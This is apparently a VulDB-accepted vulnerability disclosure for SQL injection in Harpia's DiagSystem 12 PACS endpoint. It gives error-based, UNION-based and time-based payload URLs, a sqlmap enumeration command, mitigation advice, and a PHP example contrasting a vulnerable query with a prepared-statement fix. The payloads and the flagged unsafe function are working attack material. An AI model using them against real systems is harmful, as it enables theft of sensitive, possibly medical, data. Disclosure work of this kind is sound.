Submit #497125: harpia.com.br DiagSystem 12 SQL Injection

Title: harpia.com.br DiagSystem 12 SQL Injection
Description:

# Proof of Concept - SQL Injection Vulnerability in DiagSystem by Harpia

## Summary

A SQL Injection vulnerability was identified in the DiagSystem software developed by Harpia. The vulnerability allows an attacker to execute arbitrary SQL queries on the backend database, potentially leading to unauthorized data access and system compromise.

Screenshot of the SQLi: https://drive.google.com/file/d/10IspKbYh7TYmxRPRIQZ7oRg6Xise8ykJ/view?usp=sharing

## Vulnerability Details

- **Vendor**: Harpia
- **Product**: DiagSystem
- **Affected Endpoint**: `/diagsystem/PACS/atualatendimento_jpeg.php` (tested instance: `http://x.x.x.x:8081/diagsystem/PACS/atualatendimento_jpeg.php`)
- **Vulnerable Parameter**: `codexame`
- **Vulnerability Type**: SQL Injection (Error-Based, Time-Based, and UNION-Based)
- **DBMS**: PostgreSQL
- **Impact**: Information disclosure, unauthorized access to sensitive data

## Proof of Concept

### Technical Details

The `codexame` parameter is vulnerable to SQL Injection, allowing an attacker to manipulate database queries.

Injection types confirmed:

- Error-Based SQL Injection
- Boolean-Based Blind SQL Injection
- UNION-Based SQL Injection
- Time-Based Blind SQL Injection

### Exploitable Payloads

Error-Based SQL Injection:

```
http://x.x.x.x:8081/diagsystem/PACS/atualatendimento_jpeg.php?cod=10677448&tp=JPEG&codexame=10677448 AND 7964=CAST((CHR(113)||CHR(107)||CHR(107)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (7964=7964) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(118)||CHR(112)||CHR(113)) AS NUMERIC)
```

UNION-Based SQL Injection:

```
http://x.x.x.x:8081/diagsystem/PACS/atualatendimento_jpeg.php?cod=10677448&tp=JPEG&codexame=-7842 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(107)||CHR(107)||CHR(106)||CHR(113))||(CHR(67)||CHR(90)||CHR(87)||CHR(111)||CHR(116)||CHR(72)||CHR(81)||CHR(88)||CHR(76)||CHR(100)||CHR(106)||CHR(110)||CHR(101)||CHR(100)||CHR(115)||CHR(72)||CHR(106)||CHR(70)||CHR(116)||CHR(111)||CHR(76)||CHR(83)||CHR(86)||CHR(67)||CHR(121)||CHR(67)||CHR(118)||CHR(100)||CHR(105)||CHR(88)||CHR(115)||CHR(122)||CHR(107)||CHR(74)||CHR(115)||CHR(72)||CHR(116)||CHR(80)||CHR(90)||CHR(118))||(CHR(113)||CHR(122)||CHR(118)||CHR(112)||CHR(113))--
```

Time-Based Blind SQL Injection:

```
http://x.x.x.x:8081/diagsystem/PACS/atualatendimento_jpeg.php?cod=10677448&tp=JPEG&codexame=10677448 AND 3841=(SELECT 3841 FROM PG_SLEEP(5))
```

### Database Enumeration

Using SQLMap, the following command was executed to retrieve the available databases:

```
sqlmap -r request.txt --level=5 --risk=3 --batch --dbs --random-agent --tamper=space2comment
```

### Extracted Databases

- information_schema
- pg_catalog
- pg_temp_42
- pg_temp_69
- public

### Impact

Exploitation of this vulnerability allows an attacker to:

- Enumerate database names.
- List tables within the public schema.
- Extract sensitive information from the database.

## Mitigation

It is strongly recommended that Harpia:

- Implement prepared statements and parameterized queries.
- Sanitize and validate user input before processing database queries.
- Restrict database permissions following the principle of least privilege.
- Conduct security testing to identify and mitigate similar vulnerabilities.

## Responsible Disclosure

This report is being submitted following ethical guidelines. We only enumerated database names and listed tables within the public schema. No further exploitation was performed to preserve the integrity of the system. The vendor is advised to assess and remediate the vulnerability as soon as possible.
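To make the first two mitigation points concrete, the following is an added example written for this page, not Harpia's or DiagSystem's source (which is not available here). It shows a constructed PHP handler for a `codexame` lookup in the unsafe string-concatenation form that produces exactly the injection class reported above, next to a hardened version that validates the parameter and binds it through a PDO prepared statement against PostgreSQL. The table name `exames`, the column `jpeg_path`, and the connection values are assumptions.

```php
<?php
// Added example, not DiagSystem's own code. Table/column names
// ("exames", "jpeg_path") and the connection details are assumptions.

// Strict validation for the codexame parameter: the endpoint only ever
// handles numeric exam identifiers, so anything that is not a plain
// unsigned integer is rejected before it can reach the database.
// Returns the integer value, or null when the input is not acceptable.
function validateCodexame($raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $s = (string) $raw;
    // Digits only: no sign, no whitespace, no operators, bounded length.
    if (!preg_match('/^[0-9]{1,18}$/', $s)) {
        return null;
    }
    return (int) $s;
}

// VULNERABLE pattern (the one behind the report): the request parameter is
// interpolated into the SQL text, so a value such as
// "10677448 AND 3841=(SELECT 3841 FROM PG_SLEEP(5))" is executed as SQL.
// Shown for contrast only; this is the code shape that must be removed.
function fetchJpegUnsafe(PDO $db, string $codexame): ?string
{
    $sql = "SELECT jpeg_path FROM exames WHERE codexame = " . $codexame;
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['jpeg_path'];
}

// HARDENED version: validate first, then bind the value as a typed
// parameter. The statement text is fixed at prepare time and the value is
// transmitted separately, so the input can never alter the query shape;
// this closes error-based, boolean-blind, UNION and time-based variants
// alike, because none of them can reach the SQL parser.
function fetchJpegSafe(PDO $db, $rawCodexame): ?string
{
    $codexame = validateCodexame($rawCodexame);
    if ($codexame === null) {
        http_response_code(400);   // reject malformed identifiers outright
        return null;
    }
    $stmt = $db->prepare('SELECT jpeg_path FROM exames WHERE codexame = :codexame');
    $stmt->bindValue(':codexame', $codexame, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['jpeg_path'];
}

// Wiring inside the endpoint (placeholder connection values):
//
// $db = new PDO('pgsql:host=DB_HOST;dbname=DB_NAME', 'DB_USER', 'DB_PASS', [
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//     PDO::ATTR_EMULATE_PREPARES => false, // true server-side prepares on pgsql
// ]);
// $path = fetchJpegSafe($db, $_GET['codexame'] ?? '');
```

Two practical notes on the hardened form. First, the validation step is a defence-in-depth layer, not the fix: the prepared statement is what actually removes the injection, and it stays effective for the blind and time-based variants that do not depend on any error output. Second, the error-based payload in the report works only because database error text reaches the HTTP response; with `ERRMODE_EXCEPTION` the exception should be caught and logged server-side and a generic error returned to the client, which removes that disclosure channel independently of the query fix. The remaining mitigation point, least privilege, is applied on the PostgreSQL side by running the web application under a role that has only the `SELECT` rights the endpoint needs.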
Source: http://x.x.x.x:8081/diagsystem/PACS/atualatendimento_jpeg.php?cod=10677448&tp=JPEG&codexame=-7842 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(107)||CHR(107)||CHR(106)||CHR(113))||(CHR(67)||CHR(90)||CHR(87)||CHR(111)||CHR(116)||CHR(72)||CHR(81)||CHR(88)
User: Samuel Jesus (UID 81288)
Submission: 09.02.2025 01:40 (1 year ago)
Moderation: 21.02.2025 09:20 (12 days later)
Status: Accepted
VulDB Entry: 296477 [Harpia DiagSystem 12 atualatendimento_jpeg.php codexame SQL Injection]
Points: 20
